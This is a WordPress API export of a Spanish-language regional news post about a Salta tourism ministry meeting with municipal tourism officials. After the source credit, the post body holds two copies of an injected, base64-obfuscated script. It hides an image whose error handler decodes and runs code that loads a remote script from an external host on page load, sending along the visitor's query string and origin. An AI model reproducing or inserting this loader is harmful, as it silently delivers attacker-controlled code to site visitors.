{"id":1638,"date":"2022-10-19T12:04:21","date_gmt":"2022-10-19T15:04:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1638"},"modified":"2025-08-14T00:32:51","modified_gmt":"2025-08-14T03:32:51","slug":"el-gobierno-y-referentes-turisticos-del-sur-provincial-avanzan-en-politicas-de-desarrollo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1638","title":{"rendered":"El Gobierno y referentes tur\u00edsticos del sur provincial avanzan en pol\u00edticas de desarrollo"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#5d0219\"><em>Referentes tur\u00edsticos de municipios que conforman la regi\u00f3n Valle Hist\u00f3rico y Gaucho con el equipo del Ministerio de Turismo y Deportes, trabajaron en acciones que potencien la actividad en el marco del plan Liderar.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;se reuni\u00f3 con los referentes de las \u00e1reas tur\u00edsticas municipales que conforman la regi\u00f3n Valle Hist\u00f3rico y Gaucho que participaron de una reuni\u00f3n convocada por la Subsecretar\u00eda de Desarrollo y Competitividad de la cartera Tur\u00edstica con el objetivo de avanzar en las estrategias para potenciar la oferta tur\u00edstica a partir de lo trabajado en el Plan Liderar.&nbsp;<\/p>\n\n\n\n<p>Pe\u00f1a destac\u00f3 la importancia del trabajo con una visi\u00f3n federal para \u201centre todos aportar y sumar lo que cada regi\u00f3n necesita en el \u00e1mbito tur\u00edstico\u201d, asimismo, sostuvo que el crecimiento de Salta depende del desarrollo de los municipios en toda la provincia, potenciando a destinos emergentes y a los destinos que tienen un mayor recorrido. &nbsp;<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Alejandro Cha Usandivaras<\/strong>, subsecretario de Desarrollo y Competitividad, acompa\u00f1ado por la directora general de Desarrollo de Destinos Tur\u00edsticos&nbsp;<strong>Soledad Issa<\/strong>, indic\u00f3 la importancia de analizar como regi\u00f3n las necesidades y establecer las l\u00edneas para el trabajo conjunto con asociaciones, instituciones, entre otros para elaborar proyectos que promuevan el turismo.&nbsp;<\/p>\n\n\n\n<p>Los referentes tur\u00edsticos de los municipios se refirieron al trabajo que realizan y los proyectos en curso;&nbsp;<strong>Carolina Singh<\/strong>&nbsp;de Rosario de la Frontera coment\u00f3 la participaci\u00f3n en la FIT y la importancia que implica; en tanto,&nbsp;<strong>Cristian Erazo<\/strong>&nbsp;de General Pizarro resalt\u00f3 el inter\u00e9s y potencial de su municipio sostenido en una gran reserva natural.&nbsp;<\/p>\n\n\n\n<p>Finalmente, &nbsp;<strong>Daniel Romano<\/strong>&nbsp;de La Candelaria indic\u00f3 que se encuentran trabajando con mesas participativas para el dise\u00f1o del Plan de Desarrollo Local; por su parte&nbsp;<strong>Alejandra P\u00e9rez<\/strong>&nbsp;de Apolinario Saravia se\u00f1al\u00f3 el compromiso de la intendencia para trabajar en conjunto y fortalecer el departamento Anta; por San Jos\u00e9 de Met\u00e1n participaron&nbsp;<strong>Roberto Moyano<\/strong>&nbsp;y&nbsp;<strong>Cristina Mu\u00f1oz<\/strong>&nbsp;quienes se refirieron a las obras que se realizan en el camping que permitir\u00e1n contar con una importante pileta y canchas para la pr\u00e1ctica deportiva.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-gobierno-y-referentes-turisticos-del-sur-provincial-avanzan-en-politicas-de-desarrollo-85575\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Referentes tur\u00edsticos de municipios que conforman la regi\u00f3n Valle Hist\u00f3rico y Gaucho con el equipo del Ministerio de Turismo y Deportes, trabajaron en acciones que potencien la actividad en el marco del plan Liderar. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;se reuni\u00f3 con los referentes de las \u00e1reas tur\u00edsticas municipales que conforman la regi\u00f3n Valle [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1639,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-1638","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1638"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1638"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1638\/revisions"}],"predecessor-version":[{"id":7313,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1638\/revisions\/7313"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1639"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}